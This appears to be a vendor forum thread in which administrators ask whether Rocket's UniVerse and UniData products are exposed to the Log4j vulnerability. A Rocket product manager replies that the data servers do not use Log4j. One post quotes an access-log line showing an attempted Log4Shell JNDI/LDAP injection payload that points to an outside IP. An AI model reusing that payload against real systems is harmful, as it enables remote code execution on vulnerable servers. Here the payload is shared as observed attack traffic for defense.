Is Universe affected by the log4j security threat?

Subject says it all - I've done some searching, haven't found anything, and like most organizations - we're looking at all of our installed products to assess our vulnerability.

We've got instances from 10.3.7 through 11.3.2 installed on various servers.

------------------------------
Allen Egerton
Developer
SS&C Technologies Inc
CT US
------------------------------

We are on Unidata 8.2.2 and I cannot find where we use this either. Can someone confirm? 

We do have TSM Spectrum backup client and server software that show this software, but I cannot see anything tied to Unidata.

------------------------------
Tom Vankirk
Unix admin
Cabinetworks Group Michigan, LLC
Garrettsville OH US
------------------------------

Subject says it all - I've done some searching, haven't found anything, and like most organizations - we're looking at all of our installed products to assess our vulnerability.

We've got instances from 10.3.7 through 11.3.2 installed on various servers.

------------------------------
Allen Egerton
Developer
SS&C Technologies Inc
CT US
------------------------------

Hi Allen,
Rocket MV has assessed all our products and will be posting an official statement to all the MV Forums shortly.  In short, it has been determined that the UniData and UniVerse data servers do not contain or use Log4j.

------------------------------
Christine Rizza
MV Product Manager
Rocket Software
crizza@rocketsoftware.com
------------------------------

Hi Allen,
Rocket MV has assessed all our products and will be posting an official statement to all the MV Forums shortly.  In short, it has been determined that the UniData and UniVerse data servers do not contain or use Log4j.

------------------------------
Christine Rizza
MV Product Manager
Rocket Software
crizza@rocketsoftware.com
------------------------------

This log4j library is used with Java.  We have our own Apache Tomcat webserver running UniObjects for Java (UOJ) using this library.  The exploit failed because of how we set up our webservers.  However, they still tried. The exploit is via the web. Here is what it looks like:
61.19.25.207 - - [12/Dec/2021:01:27:18 -0800] "GET /$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D HTTP/1.1" 302 -

The IP addresses are from Singapore and Thailand.

------------------------------
Doug Averch
Owner
U2 Logic
www.u2logic.com/tools.html
------------------------------

Hi Allen,
Rocket MV has assessed all our products and will be posting an official statement to all the MV Forums shortly.  In short, it has been determined that the UniData and UniVerse data servers do not contain or use Log4j.

------------------------------
Christine Rizza
MV Product Manager
Rocket Software
crizza@rocketsoftware.com
------------------------------

How about any addons, U2 tools, extensions, etc?

------------------------------
Tyrel Marak
Technical Support Manager
Aptron Corporation
Florham Park NJ US
------------------------------

Hi Allen,
Rocket MV has assessed all our products and will be posting an official statement to all the MV Forums shortly.  In short, it has been determined that the UniData and UniVerse data servers do not contain or use Log4j.

------------------------------
Christine Rizza
MV Product Manager
Rocket Software
crizza@rocketsoftware.com
------------------------------

Hi Chris,

U2 DBTools includes the extensible admin tool, which is commonly used throughout the U2 world.  What is the timeframe for the patched version?  In the mean time, do you have advice for us and for our clients who use it daily?

Thanks,

------------------------------
Tyrel Marak
Technical Support Manager
Aptron Corporation
Florham Park NJ US
------------------------------